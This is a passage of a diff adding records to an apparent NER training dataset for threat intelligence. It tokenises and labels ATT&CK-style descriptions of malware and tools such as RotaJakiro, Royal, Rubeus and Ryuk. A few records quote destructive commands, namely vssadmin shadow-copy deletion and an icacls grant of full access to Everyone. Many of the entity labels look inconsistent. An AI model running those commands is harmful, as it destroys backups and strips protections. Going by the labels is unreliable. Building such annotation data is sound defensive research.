"O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "When", + "executing", + "with", + "non-root", + "permissions,", + "RotaJakiro", + "uses", + "the", + "the", + "`shmget", + "API`", + "to", + "create", + "shared", + "memory", + "between", + "other", + "known", + "RotaJakiro", + "processes.", + "This", + "allows", + "processes", + "to", + "communicate", + "with", + "each", + "other", + "and", + "share", + "their", + "PID." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Purp", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RotaJakiro", + "has", + "used", + "the", + "filename", + "`systemd-daemon`", + "in", + "an", + "attempt", + "to", + "appear", + "legitimate." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "executing", + "with", + "non-root", + "permissions,", + "RotaJakiro", + "uses", + "the", + "the", + "`shmget`", + "API", + "to", + "create", + "shared", + "memory", + "between", + "other", + "known", + "RotaJakiro", + "processes.", + "RotaJakiro", + "also", + "uses", + "the", + "`execvp`", + "API", + "to", + "help", + "its", + "dead", + "process", + "\"resurrect\"." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Purp", + "B-Features", + "B-Purp", + "O", + "O", + "O", + "B-Way", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RotaJakiro", + "uses", + "a", + "custom", + "binary", + "protocol", + "using", + "a", + "type,", + "length,", + "value", + "format", + "over", + "TCP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RotaJakiro", + "uses", + "a", + "custom", + "binary", + "protocol", + "over", + "TCP", + "port", + "443." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RotaJakiro", + "can", + "monitor", + "the", + "`/proc/[PID]`", + "directory", + "of", + "known", + "RotaJakiro", + "processes", + "as", + "a", + "part", + "of", + "its", + "persistence", + "when", + "executing", + "with", + "non-root", + "permissions.", + "If", + "the", + "process", + "is", + "found", + "dead,", + "it", + "resurrects", + "the", + "process.", + "RotaJakiro", + "processes", + "can", + "be", + "matched", + "to", + "an", + "associated", + "Advisory", + "Lock,", + "in", + "the", + "`/proc/locks`", + "folder,", + "to", + "ensure", + "it", + "doesn't", + "spawn", + "more", + "than", + "one", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RotaJakiro", + "uses", + "dynamically", + "linked", + "shared", + "libraries", + "(`.so`", + "files)", + "to", + "execute", + "additional", + "functionality", + "using", + "`dlopen()`", + "and", + "`dlsym()`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RotaJakiro", + "uses", + "ZLIB", + "Compression", + "to", + "compresses", + "data", + "sent", + "to", + "the", + "C2", + "server", + "in", + "the", + "`payload`", + "section", + "network", + "communication", + "packet." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RotaJakiro", + "encrypts", + "C2", + "communication", + "using", + "a", + "combination", + "of", + "AES,", + "XOR,", + "ROTATE", + "encryption,", + "and", + "ZLIB", + "compression." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "RotaJakiro", + "executes", + "a", + "set", + "of", + "commands", + "to", + "collect", + "device", + "information,", + "including", + "`uname`.", + "Another", + "example", + "is", + "the", + "`cat", + "/etc/*release", + "|", + "uniq`", + "command", + "used", + "to", + "collect", + "the", + "current", + "OS", + "distribution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Depending", + "on", + "the", + "Linux", + "distribution", + "and", + "when", + "executing", + "with", + "root", + "permissions,", + "RotaJakiro", + "may", + "install", + "persistence", + "using", + "a", + "`.service`", + "file", + "under", + "the", + "`/lib/systemd/system/`", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "When", + "executing", + "with", + "non-root", + "level", + "permissions,", + "RotaJakiro", + "can", + "install", + "persistence", + "by", + "adding", + "a", + "command", + "to", + "the", + ".bashrc", + "file", + "that", + "executes", + "a", + "binary", + "in", + "the", + "`${HOME}/.gvfsd/.profile/`", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "When", + "executing", + "with", + "user-level", + "permissions,", + "RotaJakiro", + "can", + "install", + "persistence", + "using", + "a", + ".desktop", + "file", + "under", + "the", + "`$HOME/.config/autostart/`", + "folder." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "Rover", + "automatically", + "collects", + "files", + "from", + "the", + "local", + "system", + "and", + "removable", + "drives", + "based", + "on", + "a", + "predefined", + "list", + "of", + "file", + "extensions", + "on", + "a", + "regular", + "timeframe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rover", + "automatically", + "searches", + "for", + "files", + "on", + "local", + "drives", + "based", + "on", + "a", + "predefined", + "list", + "of", + "file", + "extensions", + "and", + "sends", + "them", + "to", + "the", + "command", + "and", + "control", + "server", + "every", + "60", + "minutes.", + "Rover", + "also", + "automatically", + "sends", + "keylogger", + "files", + "and", + "screenshots", + "to", + "the", + "C2", + "server", + "on", + "a", + "regular", + "timeframe." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rover", + "searches", + "for", + "files", + "on", + "local", + "drives", + "based", + "on", + "a", + "predefined", + "list", + "of", + "file", + "extensions." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rover", + "searches", + "for", + "files", + "on", + "attached", + "removable", + "drives", + "based", + "on", + "a", + "predefined", + "list", + "of", + "file", + "extensions", + "every", + "five", + "seconds." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rover", + "automatically", + "searches", + "for", + "files", + "on", + "local", + "drives", + "based", + "on", + "a", + "predefined", + "list", + "of", + "file", + "extensions." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rover", + "has", + "keylogging", + "functionality." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rover", + "copies", + "files", + "from", + "removable", + "drives", + "to", + "<code>C:\\system</code>." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rover", + "has", + "functionality", + "to", + "remove", + "Registry", + "Run", + "key", + "persistence", + "as", + "a", + "cleanup", + "procedure." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rover", + "persists", + "by", + "creating", + "a", + "Registry", + "entry", + "in", + "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Rover", + "takes", + "screenshots", + "of", + "the", + "compromised", + "system's", + "desktop", + "and", + "saves", + "them", + "to", + "<code>C:\\system\\screenshot.bmp</code>", + "for", + "exfiltration", + "every", + "60", + "minutes." + ], + "ner_tags": [ + "B-HackOrg", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Royal", + "uses", + "a", + "multi-threaded", + "encryption", + "process", + "that", + "can", + "partially", + "encrypt", + "targeted", + "files", + "with", + "the", + "OpenSSL", + "library", + "and", + "the", + "AES256", + "algorithm." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Royal", + "can", + "identify", + "specific", + "files", + "and", + "directories", + "to", + "exclude", + "from", + "the", + "encryption", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Royal", + "can", + "delete", + "shadow", + "copy", + "backups", + "with", + "vssadmin.exe", + "using", + "the", + "command", + "`delete", + "shadows", + "/all", + "/quiet`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Royal", + "can", + "use", + "multiple", + "APIs", + "for", + "discovery,", + "communication,", + "and", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Royal", + "can", + "scan", + "the", + "network", + "interfaces", + "of", + "targeted", + "systems." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Royal", + "can", + "enumerate", + "the", + "shared", + "resources", + "of", + "a", + "given", + "IP", + "addresses", + "using", + "the", + "API", + "call", + "`NetShareEnum`." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Royal", + "establishes", + "a", + "TCP", + "socket", + "for", + "C2", + "communication", + "using", + "the", + "API", + "`WSASocketW`." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Royal", + "has", + "been", + "spread", + "through", + "the", + "use", + "of", + "phishing", + "campaigns", + "including", + "\"call", + "back", + "phishing\"", + "where", + "victims", + "are", + "lured", + "into", + "calling", + "a", + "number", + "provided", + "through", + "email." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "I-Way", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Royal", + "can", + "use", + "`GetCurrentProcess`", + "to", + "enumerate", + "processes." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Royal", + "can", + "use", + "SMB", + "to", + "connect", + "to", + "move", + "laterally." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Royal", + "can", + "use", + "`RmShutDown`", + "to", + "kill", + "applications", + "and", + "services", + "using", + "the", + "resources", + "that", + "are", + "targeted", + "for", + "encryption." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Royal", + "can", + "use", + "`GetNativeSystemInfo`", + "and", + "`GetLogicalDrives`", + "to", + "enumerate", + "system", + "processors", + "and", + "logical", + "drives." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Royal", + "can", + "enumerate", + "IP", + "addresses", + "using", + "`GetIpAddrTable`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Rubeus", + "can", + "reveal", + "the", + "credentials", + "of", + "accounts", + "that", + "have", + "Kerberos", + "pre-authentication", + "disabled", + "through", + "AS-REP", + "roasting." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rubeus", + "can", + "gather", + "information", + "about", + "domain", + "trusts." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rubeus", + "can", + "forge", + "a", + "ticket-granting", + "ticket." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rubeus", + "can", + "use", + "the", + "`KerberosRequestorSecurityToken.GetRequest`", + "method", + "to", + "request", + "kerberoastable", + "service", + "tickets." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Rubeus", + "can", + "create", + "silver", + "tickets." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Ruler", + "can", + "be", + "used", + "to", + "enumerate", + "Exchange", + "users", + "and", + "dump", + "the", + "GAL." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-Org", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Ruler", + "can", + "be", + "used", + "to", + "automate", + "the", + "abuse", + "of", + "Outlook", + "Forms", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ruler", + "can", + "be", + "used", + "to", + "automate", + "the", + "abuse", + "of", + "Outlook", + "Home", + "Pages", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ruler", + "can", + "be", + "used", + "to", + "automate", + "the", + "abuse", + "of", + "Outlook", + "Rules", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RunningRAT", + "contains", + "code", + "to", + "compress", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RunningRAT", + "contains", + "code", + "to", + "clear", + "event", + "logs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "RunningRAT", + "contains", + "code", + "to", + "open", + "and", + "copy", + "data", + "from", + "the", + "clipboard." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RunningRAT", + "kills", + "antimalware", + "running", + "process." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RunningRAT", + "contains", + "code", + "to", + "delete", + "files", + "from", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RunningRAT", + "captures", + "keystrokes", + "and", + "sends", + "them", + "back", + "to", + "the", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RunningRAT", + "adds", + "itself", + "to", + "the", + "Registry", + "key", + "<code>Software\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "to", + "establish", + "persistence", + "upon", + "reboot." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RunningRAT", + "gathers", + "the", + "OS", + "version,", + "logical", + "drives", + "information,", + "processor", + "information,", + "and", + "volume", + "information." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "RunningRAT", + "uses", + "a", + "batch", + "file", + "to", + "kill", + "a", + "security", + "program", + "task", + "and", + "then", + "attempts", + "to", + "remove", + "itself." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "attempted", + "to", + "adjust", + "its", + "token", + "privileges", + "to", + "have", + "the", + "<code>SeDebugPrivilege</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "used", + "a", + "combination", + "of", + "symmetric", + "(AES)", + "and", + "asymmetric", + "(RSA)", + "encryption", + "to", + "encrypt", + "files.", + "Files", + "have", + "been", + "encrypted", + "with", + "their", + "own", + "AES", + "key", + "and", + "given", + "a", + "file", + "extension", + "of", + ".RYK.", + "Encrypted", + "directories", + "have", + "had", + "a", + "ransom", + "note", + "of", + "RyukReadMe.txt", + "written", + "to", + "the", + "directory." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "stopped", + "services", + "related", + "to", + "anti-virus." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "can", + "use", + "stolen", + "domain", + "admin", + "accounts", + "to", + "move", + "laterally", + "within", + "a", + "victim", + "domain." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "enumerated", + "files", + "and", + "folders", + "on", + "all", + "mounted", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "used", + "<code>vssadmin", + "Delete", + "Shadows", + "/all", + "/quiet</code>", + "to", + "to", + "delete", + "volume", + "shadow", + "copies", + "and", + "<code>vssadmin", + "resize", + "shadowstorage</code>", + "to", + "force", + "deletion", + "of", + "shadow", + "copies", + "created", + "by", + "third-party", + "applications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "can", + "create", + ".dll", + "files", + "that", + "actually", + "contain", + "a", + "Rich", + "Text", + "File", + "format", + "document." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "constructed", + "legitimate", + "appearing", + "installation", + "folder", + "paths", + "by", + "calling", + "<code>GetWindowsDirectoryW</code>", + "and", + "then", + "inserting", + "a", + "null", + "byte", + "at", + "the", + "fourth", + "character", + "of", + "the", + "path.", + "For", + "Windows", + "Vista", + "or", + "higher,", + "the", + "path", + "would", + "appear", + "as", + "<code>C:\\Users\\Public</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "used", + "multiple", + "native", + "APIs", + "including", + "<code>ShellExecuteW</code>", + "to", + "run", + "executables,<code>GetWindowsDirectoryW</code>", + "to", + "create", + "folders,", + "and", + "<code>VirtualAlloc</code>,", + "<code>WriteProcessMemory</code>,", + "and", + "<code>CreateRemoteThread</code>", + "for", + "process", + "injection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-HackOrg", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "can", + "use", + "anti-disassembly", + "and", + "code", + "transformation", + "obfuscation", + "techniques." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "called", + "<code>CreateToolhelp32Snapshot</code>", + "to", + "enumerate", + "all", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "injected", + "itself", + "into", + "remote", + "processes", + "to", + "encrypt", + "files", + "using", + "a", + "combination", + "of", + "<code>VirtualAlloc</code>,", + "<code>WriteProcessMemory</code>,", + "and", + "<code>CreateRemoteThread</code>." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "used", + "the", + "Windows", + "command", + "line", + "to", + "create", + "a", + "Registry", + "entry", + "under", + "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "used", + "the", + "C$", + "network", + "share", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "can", + "remotely", + "create", + "a", + "scheduled", + "task", + "to", + "execute", + "itself", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "called", + "<code>kill.bat</code>", + "for", + "stopping", + "services,", + "disabling", + "services", + "and", + "killing", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "I-Idus", + "O", + "B-Idus", + "I-Idus", + "O", + "O", + "B-Idus" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "called", + "<code>GetLogicalDrives</code>", + "to", + "emumerate", + "all", + "mounted", + "drives,", + "and", + "<code>GetDriveTypeW</code>", + "to", + "determine", + "the", + "drive", + "type." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "been", + "observed", + "to", + "query", + "the", + "registry", + "key", + "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Nls\\Language</code>", + "and", + "the", + "value", + "<code>InstallLanguage</code>.", + "If", + "the", + "machine", + "has", + "the", + "value", + "0x419", + "(Russian),", + "0x422", + "(Ukrainian),", + "or", + "0x423", + "(Belarusian),", + "it", + "stops", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "called", + "<code>GetIpNetTable</code>", + "in", + "attempt", + "to", + "identify", + "all", + "mounted", + "drives", + "and", + "hosts", + "that", + "have", + "Address", + "Resolution", + "Protocol", + "(ARP)", + "entries." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "used", + "Wake-on-Lan", + "to", + "power", + "on", + "turned", + "off", + "systems", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "has", + "used", + "<code>cmd.exe</code>", + "to", + "create", + "a", + "Registry", + "entry", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Ryuk", + "can", + "launch", + "<code>icacls", + "<path>", + "/grant", + "Everyone:F", + "/T", + "/C", + "/Q</code>", + "to", + "delete", + "every", + "access-based", + "restrictions", + "on", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "has", + "deleted", + "accounts", + "it", + "has", + "created." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "has", + "uploaded", + "data", + "and", + "files", + "from", + "a", + "compromised", + "host", + "to", + "its", + "C2", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "S-Type", + "primarily", + "uses", + "port", + "80", + "for", + "C2,", + "but", + "falls", + "back", + "to", 